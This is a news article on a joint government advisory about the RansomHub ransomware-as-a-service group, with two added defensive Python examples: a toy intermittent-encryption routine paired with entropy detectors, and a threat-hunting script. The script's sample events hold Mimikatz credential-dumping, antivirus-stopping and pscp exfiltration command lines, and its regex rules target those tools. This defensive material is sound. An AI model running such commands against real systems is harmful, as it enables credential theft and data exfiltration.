FBI: RansomHub ransomware compromised 210 victims since February

3 Sep 2024



The FBI, CISA, MS-ISAC and HHS reported in a joint advisory (AA24-242A, 29 August 2024) that the RansomHub ransomware group has encrypted and exfiltrated data from at least 210 victims since it emerged in February 2024. RansomHub operates as ransomware-as-a-service (RaaS), was formerly known as Cyclops and Knight, and has drawn in affiliates from other prominent operations such as LockBit and ALPHV (BlackCat) after law enforcement disrupted those groups.

RansomHub’s victims span a wide range of sectors, including critical infrastructure such as water and wastewater, healthcare, transportation, government services and more. The group uses a double extortion model: affiliates both encrypt systems and steal data, then threaten to publish the stolen data unless a ransom is paid. The ransom note typically carries no initial demand, only a client ID and a Tor (.onion) URL for negotiation, and gives the victim between three and 90 days to pay before the data is published on the group’s leak site.

Affiliates gain initial access through phishing, password spraying against accounts exposed in credential dumps, and exploitation of known vulnerabilities in internet-facing software, including Apache ActiveMQ (CVE-2023-46604), Atlassian Confluence (CVE-2023-22515) and Citrix ADC (CVE-2023-3519). Once inside, they map the network with Angry IP Scanner and Nmap, disable antivirus software, and move laterally using RDP, PsExec and commodity remote-administration and post-exploitation tooling (the advisory lists AnyDesk, Connectwise, N-Able, Cobalt Strike and Metasploit), much of which blends in with legitimate IT activity. They use Mimikatz to harvest credentials and escalate privileges, and the ransomware applies intermittent encryption, encrypting only portions of each file, which speeds up the encryption of large files and also weakens detection heuristics that look at whole-file entropy.
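The intermittent encryption mentioned above has a practical consequence for defenders that the paragraph only hints at: a file in which only every few kilobytes are encrypted does not look "random" as a whole, so a whole-file entropy check can miss it, while a per-chunk check still fires. The following Python is an added example, not code from the advisory or the article; its "ransomware" is a toy stand-in (every fourth 4 KiB chunk XORed with a SHA-256 counter-mode keystream) and its chunk size and 7.0 bits/byte threshold are illustrative assumptions, not RansomHub's actual cipher or parameters.

```python
"""Added example (not from the advisory or the article): why intermittent
encryption weakens a whole-file entropy heuristic and how a per-chunk check
recovers detection.

The 'ransomware' is a toy stand-in (every Nth chunk XORed with a SHA-256
counter-mode keystream) assumed for illustration; it is NOT the RansomHub
cipher, and the chunk size and threshold are assumptions as well.
"""
import hashlib
import math
from collections import Counter

CHUNK_SIZE = 4096          # assumed chunk size for the toy scheme
ENCRYPT_EVERY_NTH = 4      # encrypt one chunk in four, leave the rest in the clear
ENTROPY_THRESHOLD = 7.0    # bits per byte; a common 'looks encrypted' cut-off

# Constructed low-entropy sample 'document': 1024 copies of one 64-byte line.
SAMPLE_DOC = b"quarterly report: revenue 12,345; expenses 6,789; notes follow.\n" * 1024


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def keystream(key: bytes, chunk_index: int, length: int) -> bytes:
    """Deterministic keystream: SHA-256(key || chunk_index || counter) in counter mode."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + chunk_index.to_bytes(8, "big")
                              + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def intermittent_encrypt(data: bytes, key: bytes, chunk_size: int = CHUNK_SIZE,
                         every_nth: int = ENCRYPT_EVERY_NTH) -> bytes:
    """Toy intermittent encryption: XOR every `every_nth` chunk with the keystream
    and leave the other chunks untouched. XOR is its own inverse, so applying
    this twice with the same key yields the original bytes."""
    out = bytearray(data)
    for idx, start in enumerate(range(0, len(data), chunk_size)):
        if idx % every_nth:
            continue
        block = data[start:start + chunk_size]
        ks = keystream(key, idx, len(block))
        out[start:start + len(block)] = bytes(a ^ b for a, b in zip(block, ks))
    return bytes(out)


def whole_file_looks_encrypted(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """Naive detector: a single entropy value for the whole file."""
    return shannon_entropy(data) >= threshold


def encrypted_chunk_fraction(data: bytes, chunk_size: int = CHUNK_SIZE,
                             threshold: float = ENTROPY_THRESHOLD) -> float:
    """Per-chunk detector: fraction of chunks whose entropy crosses the threshold."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    if not chunks:
        return 0.0
    return sum(shannon_entropy(c) >= threshold for c in chunks) / len(chunks)


def demo(doc: bytes = SAMPLE_DOC) -> dict:
    """Run both detectors against the clean and the intermittently encrypted sample."""
    key = hashlib.sha256(b"example key, not a real one").digest()
    encrypted = intermittent_encrypt(doc, key)
    return {
        "plaintext_entropy": shannon_entropy(doc),
        "whole_file_entropy": shannon_entropy(encrypted),
        "whole_file_flagged": whole_file_looks_encrypted(encrypted),
        "encrypted_chunk_fraction": encrypted_chunk_fraction(encrypted),
        "clean_chunk_fraction": encrypted_chunk_fraction(doc),
        "roundtrip_ok": intermittent_encrypt(encrypted, key) == doc,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

With a quarter of the chunks encrypted, the whole-file entropy stays well under the 7.0 threshold (the clear-text chunks dominate the byte distribution), so the naive detector reports nothing, while the per-chunk detector reports that exactly 25% of chunks look encrypted. In production this is the argument for chunk-level entropy or file-header checks on write paths rather than one number per file.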

RansomHub’s activity has been growing, accounting for a significant share of global ransomware attacks in 2024, with a notable focus on European organizations. Exfiltration methods vary by affiliate; the advisory lists PuTTY (pscp, psftp), Amazon S3 buckets, plain HTTP POST requests, WinSCP and Rclone among the tools used to move stolen data out of victim networks.
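The tooling named in the two paragraphs above (Nmap and Angry IP Scanner for reconnaissance, antivirus tampering, Mimikatz, and PuTTY or Amazon S3 for exfiltration) is also what a first-pass hunt over process-creation telemetry can key on. The Python below is an added example, not code from the advisory or the article; it assumes a simplified Sysmon-like JSON event shape (host, user, image, cmdline), the sample events are constructed rather than real logs, and the regexes and the two-stage correlation threshold are illustrative choices rather than an official rule set. The ATT&CK technique IDs are the standard ones for each behaviour.

```python
"""Added example (not from the advisory or the article): a first-pass hunt
over process-creation telemetry for the tooling named in the article.

Assumptions: one JSON event per line in a simplified Sysmon-like shape;
constructed sample events (not real logs); illustrative regexes and
correlation threshold, not an official detection rule set."""
import json
import re
from collections import defaultdict

# Constructed sample telemetry. Note the renamed Mimikatz binary (mk.exe):
# tooling is routinely renamed, so the rules key on command lines and
# module-style arguments, not only on image names.
SAMPLE_EVENTS = r"""
{"ts":"2024-08-20T09:12:01Z","host":"ws-finance-07","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\Downloads\\nmap.exe","cmdline":"nmap.exe -sS -p 445,3389 10.20.0.0/24"}
{"ts":"2024-08-20T09:20:44Z","host":"ws-finance-07","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\sc.exe","cmdline":"sc.exe stop WinDefend"}
{"ts":"2024-08-20T09:31:10Z","host":"ws-finance-07","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\Downloads\\mk.exe","cmdline":"mk.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"}
{"ts":"2024-08-20T10:05:59Z","host":"ws-finance-07","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\Downloads\\pscp.exe","cmdline":"pscp.exe -pw ******** C:\\finance\\q2.zip backup@203.0.113.45:/srv/in/"}
{"ts":"2024-08-20T11:14:27Z","host":"ws-finance-07","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe C:\\finance\\notes.txt"}
{"ts":"2024-08-20T08:00:03Z","host":"jump-admin-01","user":"CORP\\netops","image":"C:\\Program Files (x86)\\Nmap\\nmap.exe","cmdline":"nmap.exe -sn 10.20.0.0/24 -oA weekly-inventory"}
{"ts":"2024-08-20T02:00:00Z","host":"srv-app-02","user":"NT AUTHORITY\\SYSTEM","image":"C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe","cmdline":"aws.exe s3 sync D:\\backups s3://corp-backup-prod/app-02/"}
"""

# (ATT&CK technique, description, pattern applied to "image cmdline" lower-cased)
RULES = [
    ("T1046", "Network Service Discovery: Nmap / Angry IP Scanner",
     re.compile(r"(^|[\\/\s])(nmap|ipscan)\b")),
    ("T1003.001", "OS Credential Dumping: LSASS Memory (Mimikatz modules)",
     re.compile(r"mimikatz|sekurlsa::|lsadump::")),
    ("T1562.001", "Impair Defenses: Disable or Modify Tools (AV service stop)",
     re.compile(r"\b(sc|net)(\.exe)?\s+stop\s+(windefend|sense|mssecflt)\b"
                r"|set-mppreference\b.*-disablerealtimemonitoring")),
    ("T1048", "Exfiltration Over Alternative Protocol (PuTTY pscp/psftp/plink)",
     re.compile(r"(^|[\\/\s])(pscp|psftp|plink)\b")),
    ("T1567.002", "Exfiltration to Cloud Storage (Amazon S3 upload)",
     re.compile(r"\baws(\.exe)?\s+s3\s+(cp|sync|mv)\b|s3://")),
]


def parse_events(text: str) -> list[dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def match_event(event: dict) -> list[str]:
    """ATT&CK technique IDs whose pattern matches this event's image or command line."""
    haystack = f"{event.get('image', '')} {event.get('cmdline', '')}".lower()
    return [tid for tid, _desc, rx in RULES if rx.search(haystack)]


def hunt(events: list[dict], min_stages: int = 2) -> dict[str, list[str]]:
    """Correlate per host. A single hit (an admin's scheduled nmap sweep, a backup
    job syncing to S3) is noise on its own; a host showing several distinct
    stages of the chain is what to escalate."""
    by_host: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        by_host[ev["host"]].update(match_event(ev))
    return {h: sorted(t) for h, t in by_host.items() if len(t) >= min_stages}


if __name__ == "__main__":
    for host, techniques in hunt(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(techniques)}")
```

Run against the constructed events, only ws-finance-07 is escalated (discovery, AV tampering, credential dumping and pscp exfiltration on one host), while the jump host's inventory scan and the server's scheduled S3 backup each trip one rule and are left alone. Tune the threshold and add a time window before using anything like this for real; the point is the correlation, not the individual regexes.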

This development reflects a broader trend in ransomware, where attacks have evolved beyond encryption and data theft into triple and quadruple extortion: adding DDoS attacks against the victim, and applying pressure on the victim’s customers and business partners whose data was also exposed.

The rise of RaaS models has lowered the barrier to entry, producing a steady stream of new ransomware variants and, in some cases, overlap between criminal groups and nation-state actors seeking to profit from these illicit activities.